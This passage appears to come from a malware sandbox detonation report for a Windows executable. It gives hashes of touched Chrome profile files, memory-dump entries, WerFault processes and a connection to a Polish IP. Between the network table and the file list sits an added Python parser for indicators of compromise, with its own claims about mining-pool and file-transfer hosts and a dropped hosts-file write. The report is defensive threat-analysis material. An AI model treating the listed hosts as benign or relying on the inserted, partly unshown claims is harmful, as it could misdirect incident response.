SHA512 3305005c9476d4ec560c0dbaeed53681b61ef1acce4db9616cebb5106b29611cead98e624ecddaed0ff5043f99215ceffbf09e99ffa33ad445cc873eafb695cf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\index

MD5 ac157f0aa7d21d773c5aa70355264cff
SHA1 4ac77be93d0258a4df1f3a7870dde93fb6ea5c9e
SHA256 b70ad87bb00a091bd30e5f0e31227d21398bb77d73ee2bbf83e4ed780bd09033
SHA512 09e9a01899b541cc86b83d994ec0d31469fd4597a2ff2e2a71f2e3c4173a6da5481aa27f36e7eedb2a39956614f47fa494d2e839346d35404ec9b30c29edf7fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\f_000004

MD5 5641d2e6eb6f88f5c306ef14bcda7513
SHA1 1714fcfbf63fc8d860c0edb99ca221ac99194f07
SHA256 d573a0546fac381049946c0b0bdad4c42d2e60b572b79ed8c41e51894d9ef1ab
SHA512 2f4d2220ce860110fb6ad9b438b05d43551577f93f45bc97f56aa80c89e1a369734b64c190335a9df1963c547a5b607c5f8e3e229da906a36ff6f96d387a1774

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\f_000002

MD5 01af703c52ac5a93685bb3911d6918f1
SHA1 cbb1279745c1c2208fb9b8606e3d3513cd5dc3e7
SHA256 75ecbede729daef7531a6e43dcaf82afd1ac691c5a993231ddbe40254bf01653
SHA512 fbf1f2a3180f001cab1a860425f750010d6932479b343d5848ee0a78e03e29a46a123ee0103560d87df32daa3f6878cde07927e11e0615ad8e3c8e1568b942c6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\f_000001

MD5 a6cddc9e38cf40c59523448782c5278e
SHA1 af0a38e884f18ebe89c985ed66d90c136f0189b4
SHA256 a47702518180625617fd3a9d7ef9867ed62718c260cb47f389d754c092bf09d9
SHA512 e48b084a5a077c5452fe77c0d200b9b197d8b689ed2db7e197389314236cadcb14a47d235efcd131654e63f992a9d6ffedec27b4b5147a10ee350470f796667c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\data_3

MD5 b00c78ca69b0921f054715047f12dd84
SHA1 26d460cddafaaa804acebc1a86341cc01fadfeed
SHA256 46bd28a0b55645047cb10c4db8d6c38b4d0fa5f8e78d3805232df849bb725747
SHA512 7188224575b49bd38ea8652be3205f3f65472173f0a6dc6aafb7d529c2aa48ad1032342215e1c875b9eee509890876cd6d29f12c23460987dad6b84c7389386b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\data_2

MD5 d7b49ebe444ab1a33d3b360c55839e6a
SHA1 65f28adb6eea56a7b6d80281bfd2a443303da3f3
SHA256 2aace938489167380c338e66d864f6e491dab17ce30119a3a4de336522af2e6a
SHA512 8c35a53150055863b29d16344009a6833bf83b39ac46f570efeedbe77fa27ac3502cb3387eb4ccab2d3a9c41f616230f8b11d214f0c3d891fbed5e297e31afe6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\data_1

MD5 b84f45fb80c1a9f29d1729407ba1e0de
SHA1 4405b5495443c3ff566b9be2cb2c60c2778dfda4
SHA256 412ff27a6693305caac884767bc5081a274830f565c6a6dd055c0d8f6b34bf73
SHA512 5eb1d8e6e9a5adbfa2c11666b572402124ce36a8509a5696c8e0bfa90c8cc61ba12af42ed4dd44c8c15da5f9ef730a51346c346253d75b814af296065434068c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Cache\Cache_Data\data_0

MD5 6e13a0b443a39373ecbde86ded067e44
SHA1 fb5c1b9bc994dd3862a3d3de31dc7c62810732e9
SHA256 a233d95cb8d8a737d48eb7a87504d6bfb02a89a57de4ccd29a2e2944a7d573ce
SHA512 dd041de35f4361f058113a5836187124d7211224503e2852507fe6199a25d24d010c96decef85a55a8771c59e27621c45525a8d33f2113723d620a602395e413

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Crashpad\settings.dat

MD5 69a62a5326d21642e2daef23acd87ce5
SHA1 ae232f9f20b993f769ae63768aa92eb02376f058
SHA256 6e80b10e27e19693b159f39f360cb939029877fcec258730b598f16a288c490c
SHA512 4f65b279d4c5c58476cfd51fe4397dae103b0ec2790065c48436ef784c95887f8f8010e9bff411e26b307e8104e74e9991a5697d5971841ecdf0516bb0079074

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\DevToolsActivePort

MD5 2b85ff5da04ebc55275ab99f9e26d04f
SHA1 40b21c436c72fdbcbbfeb68f1986e0b2f088db78
SHA256 48023726c9bb4640c6367efa6db04bbe09ab312fa9aa7cc42b7e26eb2dc674e9
SHA512 37d720a0486ec0f5bf202e0bb8acb8230f2765872af08a0f87a31cb72d7af57990470d502e153759819910a5c7c9ff98b0111248c6a9a2eb50b671728b1a9880

memory/2432-510-0x0000000073E10000-0x00000000744FE000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

memory/2392-534-0x000000013F7A0000-0x0000000140A05000-memory.dmp

memory/1080-536-0x0000000076DF0000-0x0000000076F99000-memory.dmp

memory/1080-539-0x000000013F7A0000-0x0000000140A05000-memory.dmp

memory/1080-540-0x0000000076DF0000-0x0000000076F99000-memory.dmp

memory/1776-548-0x0000000019B50000-0x0000000019E32000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-12 06:42

Reported

2023-08-12 06:44

Platform

win10v2004-20230703-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe

"C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2948 -ip 2948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 1292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2948 -ip 2948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 1092

Network

Country  Destination         Domain                        Proto
US       8.8.8.8:53          158.240.127.40.in-addr.arpa   udp
US       8.8.8.8:53          4.159.190.20.in-addr.arpa     udp
US       8.8.8.8:53          108.211.229.192.in-addr.arpa  udp
US       8.8.8.8:53          208.194.73.20.in-addr.arpa    udp
PL       51.83.170.21:19447                                tcp
US       8.8.8.8:53          21.170.83.51.in-addr.arpa     udp
US       8.8.8.8:53          2.136.104.51.in-addr.arpa     udp
US       8.8.8.8:53          157.123.68.40.in-addr.arpa    udp
US       8.8.8.8:53          240.81.21.72.in-addr.arpa     udp
US       8.8.8.8:53          11.227.111.52.in-addr.arpa    udp
US       8.8.8.8:53          10.179.89.13.in-addr.arpa     udp
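The Network tables of both detonations and the behavioral1 Files list are flat listings that mix real connections with resolver queries (every row to 8.8.8.8:53), reverse PTR lookups, loopback traffic, memory-dump entries and repeated entries for the same dropped file. The parser below is an added example, not code from the report or the sandbox vendor: it reads rows copied from those sections (trimmed, with the SHA1/SHA512 lines dropped) and returns de-duplicated connection IOCs, the dropped executables grouped by SHA-256, the hosts-file write, and the zero-byte entries whose SHA-256 is the empty-input hash. Treating a host name that starts with "stratum" as a mining-pool hint, and keeping the loopback rows aside for correlation with the DevToolsActivePort file in the Files list, are assumptions made here.

```python
"""
Parser for this report's flattened Network and Files listings (added example,
not code from the report or the sandbox vendor). NETWORK_TEXT and FILES_TEXT
hold rows copied from the behavioral1/behavioral2 sections above, trimmed to
a few entries with SHA1/SHA512 lines dropped; the classification rules
(resolver, loopback, PTR, "stratum" naming, empty-file hash) are assumptions.
"""
import re

NETWORK_TEXT = """
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
N/A 127.0.0.1:51512 tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
"""
FILES_TEXT = r"""
\Users\Admin\AppData\Local\Temp\mi.exe
MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
C:\Users\Admin\AppData\Local\Temp\mi.exe
MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
\Users\Admin\AppData\Local\Temp\cli.exe
MD5 b78141a544759e1a07740aa28b35584c
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
memory/1356-153-0x000000000D0B0000-0x000000000D33B000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
MD5 2b19df2da3af86adf584efbddd0d31c0
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Network\Cookies-journal
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

NET_ROW = re.compile(r"^(?P<cc>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
                     r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$")
HASH_ROW = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
RESOLVER = ("8.8.8.8", 53)          # the sandbox's DNS forwarder: queries, not connections
PTR_SUFFIX = ".in-addr.arpa"
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  # SHA-256 of zero bytes


def parse_network(text):
    rows = []
    for line in text.splitlines():
        m = NET_ROW.match(line.strip())
        if m:
            rows.append({**m.groupdict(), "port": int(m.group("port"))})
    return rows


def network_iocs(rows):
    """Separate real connections from resolver queries, PTR lookups and loopback noise."""
    out = {"connections": set(), "dns_queries": set(), "reverse_lookups": set(),
           "loopback": set(), "mining_pool_hint": set()}
    for r in rows:
        name = r["domain"] or ""
        if r["ip"].startswith("127."):
            out["loopback"].add((r["ip"], r["port"]))   # correlate with DevToolsActivePort in the Files list
        elif (r["ip"], r["port"]) == RESOLVER and r["proto"] == "udp":
            if name.endswith(PTR_SUFFIX):                # 21.170.83.51.in-addr.arpa -> 51.83.170.21
                out["reverse_lookups"].add(".".join(reversed(name[:-len(PTR_SUFFIX)].split("."))))
            elif name:
                out["dns_queries"].add(name)
        else:
            out["connections"].add((r["ip"], r["port"], r["domain"]))
            if name.startswith("stratum"):               # heuristic: Stratum mining-pool host naming
                out["mining_pool_hint"].add(name)
    return out


def _normalize(path):
    # The report lists the same file as both \Users\... and C:\Users\...; unify on the drive form.
    return "C:" + path if path.startswith("\\") and not path.startswith("\\??\\") else path


def parse_files(text):
    """Group file entries by SHA-256; memory dump entries carry no hashes and are skipped."""
    records, current = [], None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        m = HASH_ROW.match(line)
        if m:
            if current is not None:
                current[m.group(1).lower()] = m.group(2)
        elif line.startswith("memory/"):
            current = None
        else:
            current = {"path": _normalize(line)}
            records.append(current)
    by_hash = {}
    for rec in records:
        if "sha256" in rec:
            by_hash.setdefault(rec["sha256"], {"md5": rec.get("md5"), "paths": set()})["paths"].add(rec["path"])
    return by_hash


def dropped_executables(by_hash):
    return {h: e for h, e in by_hash.items()
            if h != EMPTY_SHA256 and any(p.lower().endswith(".exe") for p in e["paths"])}


def sensitive_writes(by_hash):
    return {p for e in by_hash.values() for p in e["paths"] if p.lower().endswith(r"\drivers\etc\hosts")}


def empty_files(by_hash):
    return set(by_hash.get(EMPTY_SHA256, {"paths": set()})["paths"])
```

Diffing reverse_lookups against connections is worth the extra line: the behavioral2 run reverse-resolves 21.170.83.51.in-addr.arpa, which is the same 51.83.170.21:19447 endpoint both detonations connect to, so that address is the one to block first, ahead of the transfer.sh and stratum pool hosts.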

Files

memory/2948-133-0x0000000001A60000-0x0000000001A89000-memory.dmp

memory/2948-134-0x0000000003540000-0x000000000357F000-memory.dmp

memory/2948-135-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/2948-136-0x0000000074FE0000-0x0000000075790000-memory.dmp

memory/2948-137-0x0000000003800000-0x0000000003810000-memory.dmp

memory/2948-138-0x0000000003800000-0x0000000003810000-memory.dmp

memory/2948-139-0x00000000060B0000-0x0000000006654000-memory.dmp

memory/2948-140-0x00000000067A0000-0x0000000006DB8000-memory.dmp

memory/2948-141-0x0000000006DC0000-0x0000000006ECA000-memory.dmp

memory/2948-142-0x0000000003800000-0x0000000003810000-memory.dmp

memory/2948-143-0x0000000006EF0000-0x0000000006F02000-memory.dmp

memory/2948-144-0x0000000006F10000-0x0000000006F4C000-memory.dmp

memory/2948-145-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/2948-146-0x0000000001A60000-0x0000000001A89000-memory.dmp

memory/2948-147-0x0000000003540000-0x000000000357F000-memory.dmp

memory/2948-148-0x0000000074FE0000-0x0000000075790000-memory.dmp

memory/2948-149-0x0000000007210000-0x0000000007286000-memory.dmp

memory/2948-150-0x0000000007290000-0x0000000007322000-memory.dmp

memory/2948-151-0x0000000007330000-0x0000000007396000-memory.dmp

memory/2948-152-0x0000000003800000-0x0000000003810000-memory.dmp

memory/2948-153-0x0000000003800000-0x0000000003810000-memory.dmp

memory/2948-154-0x0000000007BA0000-0x0000000007BF0000-memory.dmp

memory/2948-155-0x0000000009C20000-0x0000000009DE2000-memory.dmp

memory/2948-156-0x0000000003800000-0x0000000003810000-memory.dmp

memory/2948-157-0x0000000009DF0000-0x000000000A31C000-memory.dmp

memory/2948-160-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/2948-161-0x0000000074FE0000-0x0000000075790000-memory.dmp